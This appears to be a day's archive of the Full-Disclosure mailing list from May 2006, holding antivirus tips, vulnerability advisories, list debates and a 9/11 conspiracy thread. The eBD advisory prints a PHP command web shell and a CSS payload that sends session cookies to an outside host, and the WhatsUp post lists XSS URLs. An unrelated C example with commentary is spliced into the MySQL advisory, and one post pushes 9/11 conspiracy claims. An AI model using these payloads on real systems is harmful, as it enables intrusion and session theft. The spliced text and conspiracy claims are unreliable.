[Full-disclosure] Free antivirus software

2006-05-11 Thread ArsenKirillov
Hi!

Looking for something like Free AV software for Win32 OS's. If u r using something good - pls let me know!

Arsen Kirillov

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Free antivirus software

2006-05-11 Thread Ivan .

Arsen,

Grisoft AVG has a free edition for home use
http://free.grisoft.com/doc/1

cheers
Ivan



Re: [Full-disclosure] Free antivirus software

2006-05-11 Thread Eliah Kagan

I have used AVG and also Avast! Antivirus Home Edition:

http://www.avast.com/eng/avast_4_home.html

And also AntiVir PersonalEdition Classic:

http://www.free-av.com/

They all have seemed to me to work well.

-Eliah



Re: [Full-disclosure] Microsoft MSDTC NdrAllocate Validation Vulnerability

2006-05-11 Thread 0x80
Shouldn't this be considered low risk and not medium?

On Wed, 10 May 2006 17:01:09 -0700 Avert [EMAIL PROTECTED] wrote:
McAfee, Inc.
McAfee Avert(tm) Labs Security Advisory
Public Release Date: 2006-05-09

Microsoft MSDTC NdrAllocate Validation Vulnerability

CVE-2006-0034
___

___

*  Synopsis

There is an RPC procedure within the MSDTC interface in msdtcprx.dll
that may be called remotely without user credentials in such a way that
triggers a denial-of-service in the Distributed Transaction Coordinator
(MSDTC) service.

Exploitation can at most lead to a denial of service and therefore the
risk factor is at medium.
___

___

*  Vulnerable Systems

Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003

___

___

*  Vulnerability Information

The msdtcprx.dll shared library contains RPC procedures for use with
the Distributed Transaction Coordinator (MSDTC) service utilized in
Microsoft Windows.

By sending a large (greater than 4k) request to BuildContextW(), a
size check can be bypassed and a bug in NdrAllocate() may be reached.

This vulnerability was reported to Microsoft on October 12, 2005.

___

___

*  Resolution

Microsoft has provided a patch for this issue.  Please see their
bulletin, KB913580, for more information on obtaining and installing
the patch.


___

___

*  Credits

This vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs.

___

___

___

___

*  Legal Notice

Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the
convenience of McAfee's customers, and may be redistributed provided
that no fee is charged for distribution and that the advisory is not
modified in any way.  McAfee makes no representations or warranties
regarding the accuracy of the information referenced in this document,
or the suitability of that information for your purposes.

McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,
Inc. and/or its affiliated companies in the United States and/or other
Countries.  All other registered and unregistered trademarks in this
document are the sole property of their respective owners.

___

___



Re: [Full-disclosure] Free antivirus software

2006-05-11 Thread Valdis Shkesters

Hi!

Review: Free Antivirus Software
http://antivirus.about.com/od/antivirussoftwarereviews/a/freeav.htm

Regards,

Valdis Shkesters




[Full-disclosure] RE: Oracle - the last word

2006-05-11 Thread Joseph Finley
This has always been the problem with Oracle, especially from the top
down: arrogance.

Joe 

-Original Message-
From: David Litchfield [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, May 09, 2006 10:34 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk;
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Oracle - the last word

A few people have asked me recently what it is I'm actually looking for
from Oracle. I have a nice little laundry list of things, of course, but
mostly all I've been waiting for is to hear Oracle say, "We admit we
have a problem with regards to security, but here's our strategy and
we're going to make it better." In that simple admission would lie the
cessation of my criticism of Oracle. But, let's face it, it's not a
simple admission in reality. As a business, Oracle can't say, "Oops.
We've been mistaken all these years - turns out our database isn't as
secure as we actually thought."
A company like Microsoft can say, and indeed did say, something just like
that, but their business was never built on what was supposed to be a
reputation for and a foundation of security. It would be business
suicide for Oracle to do this.



After much rumination, the obvious struck me: Oracle could make their
product more secure (and improve the behind-the-scenes processes that
enable them to deliver a secure product) and all the while admit to
nothing. Whilst I've been throwing tantrums at their failure to admit to
the truth, Oracle has been working on doing this. It almost passed me
by. They're not there yet but they are getting closer. Let me put that
in concrete terms: When Oracle 10g Release 1 was released you could
spend a day looking for bugs and find thirty. When 10g Release 2 was
released I had to spend two weeks looking to find the same number.



Soon, and I have no time frame in mind for soon, Oracle will have
arrived at a point where sitting down and finding a single bug will
take a month - and not once would they have had to admit to having
problems with security. They'll have solved it. Their tools will be
tight and their processes slick. They'll almost be Unbreakable.



I'm sure the strategists at Oracle must have realized this - for an
organization such as Oracle it's really the only reasonable option
available. Okay, it's not the open strategy that I'd have preferred but,
in the end, the journey of how they got/get there, to a secure robust
product, is irrelevant.



Another thing that struck me was the amount of effort and time that it
must have taken to get a lumbering stegosaurus of a beast like Oracle to
turn around. I can only assume that, as CSO, Mary Ann must be credited with
that, and as such, I revise my position on her. Dare I say it, well
done, Mary.



I realize now that this is how it's going to be - I'm not going to get
my much sought after admission but at least we get a better, more secure
product we can be more confident in. Besides, I weary of Oracle bashing
and I've no doubt that I've wearied many here on these lists over the
years, too. NGS will, of course, continue to research and find Oracle
security flaws, report them and help Oracle to fix them but, from now
on, I'll leave the proselytizing to others. Oracle have moved
sufficiently forward enough, and with enough momentum (now), that I
believe they've passed the point of no return and can do nothing but
eventually end up where we all want them to be.



Cheers,

David Litchfield

NGSSoftware Ltd

http://www.ngssoftware.com/

+44(0) 208 401 0070





Re: [Full-disclosure] Free antivirus software

2006-05-11 Thread Geo.
 Review: Free Antivirus Software
 http://antivirus.about.com/od/antivirussoftwarereviews/a/freeav.htm

I believe I've seen Mary post here before, so if you're reading Mary, how
come this time you didn't test removal capabilities? Lots of times people
don't actually go looking for a free AV program until they need to scan and
clean their machine so removal is an important feature.

Geo.



RE: [Full-disclosure] Free antivirus software

2006-05-11 Thread Randall M
http://www.clamwin.com/

Thank You 
Randall M  

= 

You too can have your very own Computer! 

Note: Side effects include: 
Blue screens; interrupt violation; 
illegal operations; remote code 
exploitations; virus and malware infestations; 
and other unknown vulnerabilities. 

 



[Full-disclosure] [TZO-042006] Insecure Auto-Update and File execution (2)

2006-05-11 Thread Thierry Zoller

Dear List,

As my advisory has been a bit unclear in certain regards, I would like
to briefly clarify a few questions I have received:

- The auto-update problem with Zango Adware remains; there was no fix.
- The Adware component is distributed by over 10.000 affiliates
  every day and I expect it to be installed on millions of workstations (IMO).
- If you compromise (or alter) a DNS server this gives immediate access to
  internal client machines.

  The impact, citing Kevin F., is: "DNS server pwnage and then mass client
  ownage"

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



[Full-disclosure] Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability

2006-05-11 Thread Secunia Research
== 

Secunia Research 11/05/2006

  - UltimateZip unacev2.dll Buffer Overflow Vulnerability -

== 
Table of Contents

Affected Software............................................1
Severity.....................................................2
Description of Vulnerability.................................3
Solution.....................................................4
Time Table...................................................5
Credits......................................................6
References...................................................7
About Secunia................................................8
Verification.................................................9

== 
1) Affected Software 

* UltimateZip versions 2.7.1, 3.0.3, and 3.1b.

Other versions may also be affected.

== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in UltimateZip, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

== 
4) Solution 

Do not extract ACE archives from untrusted sources.

== 
5) Time Table 

26/04/2006 - Initial vendor notification.
27/04/2006 - Second vendor notification.
04/05/2006 - Third vendor notification.
11/05/2006 - Public disclosure. (No reply from vendor)

== 
6) Credits 

Discovered by Secunia Research.

== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-29/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] [ GLSA 200605-13 ] MySQL: Information leakage

2006-05-11 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200605-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: MySQL: Information leakage
  Date: May 11, 2006
  Bugs: #132146
ID: 200605-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A MySQL server may leak information to unauthorized users.

Background
==

MySQL is a popular multi-threaded, multi-user SQL database server.

Affected packages
=

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  dev-db/mysql                   < 4.1.19                  >= 4.1.19

Description
===

The processing of the COM_TABLE_DUMP command by a MySQL server fails to
properly validate packets that arrive from the client via a network
socket.

Impact
==

By crafting specific malicious packets an attacker could gather
confidential information from the memory of a MySQL server process, for
example results of queries by other users or applications. By using PHP
code injection or similar techniques it would be possible to exploit
this flaw through web applications that use MySQL as a database
backend.

Note that on 5.x versions it is possible to overwrite the stack and
execute arbitrary code with this technique. Users of MySQL 5.x are
urged to upgrade to the latest available version.
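The two length checks whose absence produces the bug classes on this page, as an added example in C. This is not code from the GLSA, from MySQL, from Secunia's UltimateZip advisory or from McAfee's MSDTC advisory; the record layout, the FNAME_MAX cap and every function name are constructed for illustration and are not the ACE or MySQL wire formats. It shows the destination bound that the unacev2.dll filename copy lacked (an attacker-chosen length written into a fixed stack buffer, the same shape as the oversize MSDTC request) next to the source bound whose absence lets a declared length run past the packet actually received, which is the over-read class behind the COM_TABLE_DUMP leak of process memory.

```c
/* Added example: bounds-checked parsing of a toy length-prefixed record.
 * Layout (constructed, not ACE or MySQL): u16 little-endian name length,
 * then the name bytes. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FNAME_MAX 64   /* fixed destination buffer, like the DLL's stack buffer */

enum parse_status { PARSE_OK = 0, PARSE_TRUNCATED = 1, PARSE_TOO_LONG = 2 };

static uint16_t read_u16_le(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* The unsafe pattern: the declared length drives both how far we read and
 * how much we write. Shown only for contrast; nothing in this file calls it. */
void unsafe_copy_name(const uint8_t *rec, char out[FNAME_MAX])
{
    uint16_t n = read_u16_le(rec);
    memcpy(out, rec + 2, n);   /* n > FNAME_MAX: stack overflow;
                                  n > bytes received: over-read of memory */
    out[n] = '\0';
}

/* Hardened version: check the declared length against what was received
 * (source bound) and against the destination (destination bound) before
 * touching memory. On success *consumed is the number of record bytes used. */
static enum parse_status parse_name(const uint8_t *rec, size_t rec_len,
                                    char *out, size_t out_sz, size_t *consumed)
{
    if (rec_len < 2)
        return PARSE_TRUNCATED;       /* not even a complete length field */
    size_t n = read_u16_le(rec);
    if (n > rec_len - 2)
        return PARSE_TRUNCATED;       /* would read past the received data */
    if (n >= out_sz)
        return PARSE_TOO_LONG;        /* would overflow the name buffer */
    memcpy(out, rec + 2, n);
    out[n] = '\0';
    *consumed = 2 + n;
    return PARSE_OK;
}

/* Classify a single record using a FNAME_MAX stack buffer. */
static enum parse_status check_record(const uint8_t *rec, size_t rec_len)
{
    char name[FNAME_MAX];
    size_t used;
    return parse_name(rec, rec_len, name, sizeof name, &used);
}

/* Walk a sequence of records (a toy archive directory). Returns the number
 * of well-formed entries; *status says why the walk stopped. */
static size_t walk_entries(const uint8_t *buf, size_t len,
                           enum parse_status *status)
{
    size_t off = 0, count = 0, used;
    char name[FNAME_MAX];
    *status = PARSE_OK;
    while (off < len) {
        enum parse_status st = parse_name(buf + off, len - off,
                                          name, sizeof name, &used);
        if (st != PARSE_OK) { *status = st; break; }
        off += used;
        count++;
    }
    return count;
}

/* Constructed inputs exercising each path; returns 1 when all behave. */
static int self_test(void)
{
    static const uint8_t good[] = { 5, 0, 'h', 'e', 'l', 'l', 'o' };
    static const uint8_t truncated[] = { 16, 0, 'a', 'b', 'c' };  /* claims 16, has 3 */
    static const uint8_t dir[] = { 3, 0, 'a', 'b', 'c',  2, 0, 'x', 'y',  9, 0, 'z' };
    uint8_t oversized[2 + 200];   /* declared length 200 > FNAME_MAX */
    enum parse_status st;

    oversized[0] = 200; oversized[1] = 0;
    memset(oversized + 2, 'A', 200);

    if (check_record(good, sizeof good) != PARSE_OK) return 0;
    if (check_record(truncated, sizeof truncated) != PARSE_TRUNCATED) return 0;
    if (check_record(oversized, sizeof oversized) != PARSE_TOO_LONG) return 0;
    return walk_entries(dir, sizeof dir, &st) == 2 && st == PARSE_TRUNCATED;
}

int main(void)
{
    int ok = self_test();
    printf("self_test: %s\n", ok ? "pass" : "FAIL");
    return ok ? 0 : 1;
}
```

Compile with `cc -Wall` and run; `self_test` drives the three outcomes and the directory walk, which stops at the first truncated entry instead of reading past the buffer. The source bound is the one parsers most often forget: the destination may be large enough, yet a declared length beyond the received bytes still copies whatever sits after the packet in memory, which is exactly what turns a malformed-packet bug into an information leak.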

Workaround
==

There is no known workaround at this time.

Resolution
==

All MySQL users should upgrade to the latest version.

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-db/mysql-4.1.19"

References
==

  [ 1 ] Original advisory

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html
  [ 2 ] CVE-2006-1516
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516
  [ 3 ] CVE-2006-1517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200605-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread n3td3v

On 5/10/06, Juha-Matti Laurio [EMAIL PROTECTED] wrote:

threat meters:


Seriously, threat meters are a waste of time and should be scrapped by all.

UK has said it will never implement a terrorism threat meter, as the
Bush administration already does to create a sense of public fear when
the political climate requires the government to have public support
on issues.

It is known that the U.S. government has raised the threat meter when their
poll rating is low, to get the public on-side: "we know more than
you do, just trust us" propaganda.

Would a threat meter have stopped 9/11 from happening?

And what do you do if the meter goes to high alert? Are folks
supposed to stop their everyday lives and start looking at everyone
who looks of eastern origin in a paranoia frenzy?

On 7/7, the London bombings, the government and security services were
caught by surprise; they had no idea about the threat, yet innocent
folks died and the city of London went into lockdown over fears of
further attacks, so much so that an innocent member of the public was
shot, because the police thought he was a potential suicide bomber. He
wasn't; the police had committed a murder, because of fear, the fear
and paranoia the terrorists wanted the government and the public to
have. They won in London, and the terrorists won in America too. Look
at the way America has reacted, in the same way the UK government and
intelligence services have. In the way the terrorists planned it to
be. To create a fear, a paranoia, a terror in the minds of everyone.

Threat meters, what do they do? They play the role of the terrorist,
bring fear, let the public know the terrorists are around. Even though
only one building in one city or one train in one city would be the
target, the whole entire nation is put on an artificial high state of
alert. The government of the U.S. doesn't even say "high state of alert for
X city", they just have some threat meter covering the entire U.S.

The same goes for the internet. We're always being told that terrorism
will one day come to cyber terrorism and hit governments and
businesses hard. Yet no specific targets are ever mentioned. It's a
threat meter for all, everyone; the so-called cyber security agencies
can't even give estimates or likeliness of attack, they just raise a
threat meter to create a hype and a need to buy the products X
security company has on offer to protect consumers and corporations
from imminent attack.

Let's call it a paranoia meter because it's hearsay; there is no
particular threat. Just because a vulnerability is wild and not
patched does not pose a threat. In terrorism a threat is specific
information that an attack is being planned. Although, the internet
threat meters are lamer than the mainland threat meter (and even the
mainland threat meter is lame), because it's completely based on
hearsay: "there's an unpatched vulnerability, this could happen, but we
don't have any intelligence whatsoever that something is being
programmed, but we thought we'd raise the internet threat level, you
know, because there's nothing else happening."

Basically, the cyber security companies are creating a hype to be
suggestive to malicious users, and of course the malicious users will
often bow to such a threat level and release an exploit worm to the
wild.

Although, that's how it used to be. The bad guys have realised now
how much money these cyber agencies are making out of exploit virii,
that they've decided not to launch an attack, based on their threat
meters. The only time a real threat will come is when cyber agencies
are off-watch. Why would an attack be launched if governments and
businesses are expecting something to happen? The element of surprise
is as important as the terrorism which gives them the name terrorist.

I conclude to say, the cyber security companies were once good at
their predictive attack guesstimations, but no longer. In today's
climate (right now) folks are more than aware of what's going on
around. No longer will the would-be exploit virii offer play lap
puddle to cyber security agencies, mcafee, symantec, trendmicro,
us-cert and the others.

Attacks will come at the least expected point. Attacks won't come
based on code you guys are aware of. Attacks will come without
warning. Attacks will come when you least expect it. Attacks will
never be predicted, will never have an early warning for, will always
be a surprise from now on.

Welcome to the future. Times are changing. You can create a paranoia
amongst the community, but the new kids on the block aren't playing a
destructive game of tig between malicious users and security vendors.
The ball is in the malicious users' court. Each time you raise your
threat level and nothing happens is eating away at the credibility of
security vendors, although the bad guys always will have a cool knack
of creeping up on everyone when they least expect it.

Raise your threat meters, you're spoiling your own business by doing
so, malicious users the more they hold off 

Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread bkfsec

n3td3v wrote:


On 5/10/06, Juha-Matti Laurio [EMAIL PROTECTED] wrote:


threat meters:



Seriously, threat meters are a waste of time and should be scrapped by
all.


Hey, I believe it's right to tell someone when they're wrong and give 
them credit when they're right... and although I disagree with some of 
your conclusions, I have to say that you've got a good point here.


About all that these threat meters do is drum people into action.  That 
is, deep down, a good thing, but it's something that people should be 
careful with.  Computers, and in particular computer security, is 
something that many people think is magic.  An organization that is not 
well mitigated and is not vigilant is as likely to get cracked into 
during a high threat level as it is at a low threat level... the threat 
meters do give people a false sense of security and a false sense of 
fear and really do only measure paranoia.


Now, that's not to say that they don't have a use, but like all tools if 
it's misused, the results will not necessarily be good.  Something to 
keep in mind.


 -bkfsec




Re: [Full-disclosure] Free antivirus software

2006-05-11 Thread Mary Landesman
Hi Geo,

I do removal tests for spyware/adware only. The virus detection scores come
from AV-Test.org and at the time, removal results for those particular
products weren't readily available to me. (This doesn't mean that
AV-Test.org does not have them or did not at the time - please interpret my
limited answer as *my* limitation and not a reflection of AV-Test.org). West
Coast Labs performs removal testing as part of their Anti-Virus Level 2
certification (all ItW viruses are included in these tests according to
their documentation). You can find a list of Anti-Virus Level 2 certified
products at:

http://www.westcoastlabs.org/cm-av-list.asp?Cat_ID=2

AV-Test.org is a project of the Business-Information-Workgroup at the
Institute of Technical and Business Information Systems at the
Otto-von-Guericke University Magdeburg (Germany)  in cooperation with
AV-Test GmbH. For details, visit: http://www.av-test.org/

I agree that virus removal tests would be a nice addition to the review -
unfortunately my resources (time) only allow for spyware/adware.

-- Mary



Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread n3td3v

bkfsec wrote:

I have to say that you've got a good point here.



These threat meters play lip service for hackers.

"Thereees zero-day in the wild, you're going to get haxx3d"

A threat is meant to be based on individuals planning something, not hearsay.

Regardz,

n3td3v



Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread Valdis . Kletnieks
On Thu, 11 May 2006 19:15:50 BST, n3td3v said:

 Thereees zero-day in the wild, you're going to get haxx3d

It's more like "We now know about a zero-day that's been on the loose
for some unknown amount of time, and you may already be hax0red. And if
you haven't, you probably will be as soon as the script kiddies who are
even more lame than our security professionals find the zero-day." HAND.



Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-11 Thread eisi
OK, the video shows a lot of nonsense facts. I'm not an aviation engineer,
but technically educated. I don't think that there were real explosions when
the towers went down, but I did not hear any verifiable clarification about
the impact on the Pentagon.

This is the part, which makes me distrustful.

So, if possible - does anyone have an explanation about the Pentagon impact as
shown in the video?

Regards,
Eisi



On Thursday 11 May 2006 02:19, Morning Wood wrote:
 the only fact worth investigating in this is the sales of stocks leading
 up to 911.
   viewed from a technical standpoint on the pentagon attack and the towers
 collapse... well this is just pure bullshit. anyone with basic physics and
 any amount of aviation experience can see the author is absolutely clueless
 in regards to these technical points.

 my2bits,
 MW



Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread n3td3v


Code alone is not a threat. It's obvious these security companies never
have specific intelligence of worms being planned. All they can base
their threat meters on is a generalization.

Which one is the threat:

A gun store has opened on the corner, someone might buy a gun and shoot

or

I overheard a conversation that johnny average is annoyed at bob and
spoke about revenge, he's really into guns, and a gun store has just
opened on the corner, johnny is mentally unstable, and he's really
good at hitting his targets, he shot someone in the past but no one
told the police.

Regardz,

n3td3v



Re: [Full-disclosure] MS06-019 - How long before this develops into aself propagating email worm

2006-05-11 Thread David Litchfield

 Thereees zero-day in the wild, you're going to get haxx3d

It's more like We now know about a zero-day that's been on the loose
for some unknown amount of time, and you may already be hax0red. And if
you haven't, you probably will be as soon as the script kiddies who are
even more lame than our security professionals find the zero-day. HAND.



Code alone is not a threat. Its obvious these security companies never
have specific intelligence of worms being planned. All they can base
their threat meters on is a generalization.



Which one is the threat:



A gun store has opened on the corner, someone might buy a gun and shoot



or



I overheard a conversation that johnny average is annoyed at bob and
spoke about revenge, he's really into  snip



They both are. The first is, of course, more general and is based upon
increased _opportunity_. The second is a specific threat based upon specific
intelligence. Bringing this back to the world of computer security: most
major Internet worms that use an overflow as their vector have exploited
previously announced flaws - with a patch being available - for example
Blaster, Slammer, Code Red. With the current situation, we have increased
opportunity: that is, there is a pre-authentication attack vector in a
commonly used product which is not commonly firewalled. In other words,
almost all the right ingredients for an Internet worm. If past experience
is anything to go by the only missing ingredient is proof of concept code
released by a well meaning security researcher!

Cheers,
David Litchfield 




Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-11 Thread Gary E. Miller

Yo Eisi!

On Thu, 11 May 2006, [EMAIL PROTECTED] wrote:

 So, if possible - does anyone have an explanation about the pentagon impact as
 shown in the video?

Here is a good start:

http://www.indybay.org/news/2005/12/1787340.php

It gets a few things wrong, but is a good start.

Still it is a good starting point if you have too much free time on
your hands.


RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588




Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-11 Thread emmanuel lewis
First disturbing thing about these videos is the amount of people who instantly say how fake they are. This one was a bit different. I don't believe the author even thinks he is 100% correct, but if some video from a gas station or a hotel rooftop captured this event, well then why would you not say here it is and show it to everyone? Would seeing more proof not just enforce their position even more? Personally I can't believe a plane, made out of metal, vaporized, vanished, and the people inside it did not. The seat, gone. The overhead compartment full of laptops, ipods, clothing, etc, gone. The serving trays, the oxygen masks, the luggage, the animals in the luggage compartment, gone. The huge metal wings, the Rolls-Royce engine, the tail section much larger than the small 12-16 foot hole, gone. But miraculously all the people could be identified. Come on. If you actually subscribe to this list, there is no way you could possibly believe that crock.


[Full-disclosure] Ipswitch WhatsUp Professional multiple flaws

2006-05-11 Thread David Maciejak

WhatsUp is a tool from Ipswitch to monitor applications and networks,
embedding a custom web server on port 8022.

Description:

This custom web server is prone to multiple flaws.

-as authenticated user:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*there are many XSS flaws, as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=SCRIPTalert(me);/SCRIPTnDeviceID=SCRIPTalert(me);/SCRIPT
http://server:8022/NmConsole/ToolResults.asp?bIsIE=truenToolType=0sHostname=%3cscript%3ealert('me')%3c/script%3enTimeout=2000nCount=1nSize=32btnPing=Ping

*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.aspsCancelURL=http://www.google.fr

-not being authenticated:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0



The weaknesses have been confirmed in version 2006, source disclosure
in version 2005 and 2005 SP1 too.
Other versions may also be affected.

No response from vendor.

Solution:
-Filter TCP port 8022; ask the vendor for a patch if you are a registered user
-Keep an eye on an open source project: http://gnms.rubyforge.org


David Maciejak



[Full-disclosure] [EEYEB-20060307] Apple QuickTime FPX Integer Overflow

2006-05-11 Thread eEye Advisories
Apple QuickTime FPX Integer Overflow

Release Date:
May 11, 2006

Date Reported:
March 7, 2006

Patch Development Time (In Days):
65 

Severity:
High (Remote Code Execution)

Vendor:
Apple

Systems Affected:
Quicktime on Windows 2000
Quicktime on Windows XP
Quicktime on Mac OS X 10.3.9

References:
This vulnerability has been assigned CVE-2006-1249

Overview:
eEye Digital Security has discovered a critical vulnerability in
QuickTime Player. There is an integer overflow in the way QuickTime
processes fpx format files. An attacker can create a fpx file and send
it to the user via email, web page, or fpx file with activex.

Technical Description:
In an fpx file, there is a field that figures out how many blocks of
data there are in that file. One block data size is 0x200, QuickTime
Player will allocate memory relying on (number*0x200) but does not check
the size value and an integer overflow can occur.  If you set the block
value to 0x80 an integer overflow will occur which will then cause a
heap overflow and write invalid memory.  

QuickTime: QuickTime File Format
http://developer.apple.com/documentation/QuickTime/QTFF/index.html

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from
this vulnerability.

Vendor Status:
Apple has released a patch for this vulnerability; information is
available at  http://docs.info.apple.com/article.html?artnum=61798

Credit:
Discovery: Fang Xing

Copyright (c) 1998-2006 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email [EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.



[Full-disclosure] Several flaws in e-business designer (eBD)

2006-05-11 Thread Pedro Andújar

Regards


  ===
   - Advisory -
  ===

  Title:   Several flaws in e-business designer
  Risk:    Critical
  Date:    03.May.2006
  Author:  Pedro Andújar pandujar [EMAIL PROTECTED] selfdefense.es
  URL:     http://www.digitalsec.es
           http://www.514.es/


.: [ INTRO ] :.

  eBD is an Integrated Development Environment for the development and
publication of web sites, web applications and web services (Applications).
In about 60% of the time typically required, Designer expedites the creation
of Applications based on an open architecture, accepted web standards and
without the need for in-depth knowledge about web technology.

  With eBD, you can develop any type of web application, web site or web
service - intranet, extranet, eCommerce, eLearning portals, etc. You can
deploy legacy applications on the web without re-coding the original
application.

  eBusiness Designer has three distinct functional layers - Presentation, Data
and Back Office. This structure permits a non-technical staff member to update
any Application in real time, preview and publish it.


.: [ TECHNICAL DESCRIPTION ] :.

  During the development of some evaluation tasks against applications managed
by the e-business designer software, several bugs were discovered:


.: [ BUG #1 ]

Risk: High
Description : Ability to upload files to the system without 
authentication
Affected versions   : = v3.1.4

  Access to a web edition tool without authentication allows remote users to
upload files without restriction. This vulnerability can be reached by
accessing the following URL:

  http://ebdsite/common/html_editor/image_browser.upload.html

  The file can be placed in different folders of the application; usually it
can be found easily by exploring the web source code and searching for the
images folder. Another useful tool to find the file is:

  http://edbsite/common/html_editor/image_browser.html

  Additionally we have the html edition tool, whose parameters are:

  function 
abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)
  {
var argumentos = form_name= + form_name + name= + name + 
source= + source +
ebd_links= + links;

if (idvista != null  idvista  0)
argumentos += usar_vista= + idvista;

if (atributo != null  atributo.length  0)
argumentos += usar_atributo= + atributo;

var href = /common/html_editor/html_editor.html?


 The result of this vulnerability consists in the ability to upload and/or
modify files on the system, giving the possibility of attacking both the
server and web users.

These kinds of attacks were carried out successfully against a server running
version 2.3.3 of eBD:

Server side exploiting:
+ Code execution in the system using php/asp...shells : If the system has php 
installed, 
command execution is possible through a web browser, uploading a file with the 
following content:


dsr.php-
? 

$out = shell_exec($_GET[cmd]. 21);

echo pre$out/pre;

 ?
dsr.php-


Then, queries like http://edbsite/path/to/dsr.phpcmd=uname -a ; id can be 
executed.


Client side exploiting:
+ Cross Site Scripting (XSS), in applications with authentication methods:
Files uploaded with image_browser.upload.html can overwrite application files,
so it is possible to include JavaScript code in a cascading style sheet
(.css), which will send us the cookie of users who have logged in, through a
GET request to our server:

background: 
url('javascript:document.images[1].src=http://514.es/514.php?+document.cookie;')
 repeat-x bottom;

We can place a script on our server to log the cookies we receive, though this
job is already done by the access_log.

XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] GET 
/514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651 
HTTP/1.1 200 316 
http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==; 
Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


  Possible script:

  -514.php--
  ?
  $log = /var/tmp/debug.log;
  $img_type = png;

  function load_png($img_path) {
  $img = imagecreatefrompng ($img_path);
